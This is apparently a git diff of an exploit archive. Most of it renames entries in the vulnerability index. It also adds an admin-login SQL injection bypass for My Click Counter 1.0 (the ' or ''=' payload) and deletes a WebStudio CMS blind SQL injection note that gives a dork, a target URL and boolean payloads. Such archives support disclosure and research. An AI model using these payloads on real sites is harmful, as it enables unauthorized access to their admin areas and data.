diff --git a/files.csv b/files.csv index bb964c279..9dc3579e1 100644 --- a/files.csv +++ b/files.csv @@ -16877,7 +16877,7 @@ id,file,description,date,author,platform,type,port 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 -2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0 +2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 @@ -18989,7 +18989,7 @@ id,file,description,date,author,platform,type,port 5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5836,platforms/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0 @@ -20001,47 +20001,47 @@ id,file,description,date,author,platform,type,port 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0 7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 -7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 -7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 +7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps,0 +7147,platforms/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 -7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 +7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0 -7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0 +7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 -7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 +7163,platforms/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps,0 7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0 -7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 +7166,platforms/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,php,webapps,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0 7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 -7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 +7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,php,webapps,0 7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps,0 7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0 -7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0 -7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0 +7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,php,webapps,0 +7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0 7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 -7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 -7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 -7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 +7180,platforms/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 +7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 +7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 -7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 +7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0 -7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 -7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0 -7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 +7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps,0 +7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps,0 +7200,platforms/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0 +7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0 +7202,platforms/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 @@ -20050,49 +20050,49 @@ id,file,description,date,author,platform,type,port 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0 7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0 -7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0 -7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0 +7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0 +7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0 -7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0 +7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0 -7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 -7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 -7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0 +7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 +7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 +7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps,0 7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0 7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0 -7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 -7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0 +7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 +7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,php,webapps,0 7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 -7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 +7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0 -7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 -7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 -7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 +7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 +7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 +40987,platforms/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 -7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 +7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 -7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 +7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 -7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0 -7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 +7248,platforms/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,php,webapps,0 +7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 -7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 +7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 -7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 +7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 -7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 -7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 +7261,platforms/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 +7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0 7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 @@ -20181,7 +20181,7 @@ id,file,description,date,author,platform,type,port 7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0 -7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 +7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0 @@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port 8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0 8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 -8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0 +8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps,0 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0 @@ -21504,7 +21504,7 @@ id,file,description,date,author,platform,type,port 9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 9510,platforms/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0 -9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 +9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0 40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 @@ -22107,7 +22107,7 @@ id,file,description,date,author,platform,type,port 10790,platforms/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps,0 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0 -10794,platforms/asp/webapps/10794.txt,"WEB Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 +10794,platforms/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0 @@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 -23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 +23653,platforms/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 @@ -28772,7 +28772,7 @@ id,file,description,date,author,platform,type,port 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 -27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 +27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27086,platforms/php/webapps/27086.txt,"White Album 2.5 - Pictures.php SQL Injection",2006-01-16,liz0,php,webapps,0 diff --git a/platforms/php/webapps/40987.txt b/platforms/php/webapps/40987.txt new file mode 100755 index 000000000..34fe82008 --- /dev/null +++ b/platforms/php/webapps/40987.txt @@ -0,0 +1,12 @@ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +[x] Type: Admin login bypass via SQLi +[x] Vendor: http://software.friendsinwar.com/ +[x] Script Name: My Click Counter +[x] Script Version: 1.0 +[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15 +[x] Author: AnarchyAngel AKA Adam +[x] Mail : anarchy[dot]ang31@gmail[dot]com +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Navigate to scripts admin login page and submit ' or ''=' for username and password +it should give you access to the admin area. Enjoy >:) diff --git a/platforms/php/webapps/7236.txt b/platforms/php/webapps/7236.txt deleted file mode 100755 index d609dfd0c..000000000 --- a/platforms/php/webapps/7236.txt +++ /dev/null @@ -1,32 +0,0 @@ -submitted: 09/01/2008 10:01 AM ------------------------------------------------------------------------------------ -Scr!pt : WebStudio CMS - -V3rs!0n : >!< - -S!t3 : http://www.bdigital.biz/?pageid=214 - -Dork : Powered by WebStudio - -Auth0r : BorN To K!LL ------------------------------------------------------------------------------------ - -Exploit : - -/index.php?pageid=[Blind SQL] - -Compression : - -index.php?pageid=1 and 1=1 <<<<< True - -index.php?pageid=1 and 1=2 <<<<< False - ------------------------------------------------------------------------------------ - -Greets : - -str0ke , Dr.2 , General C , 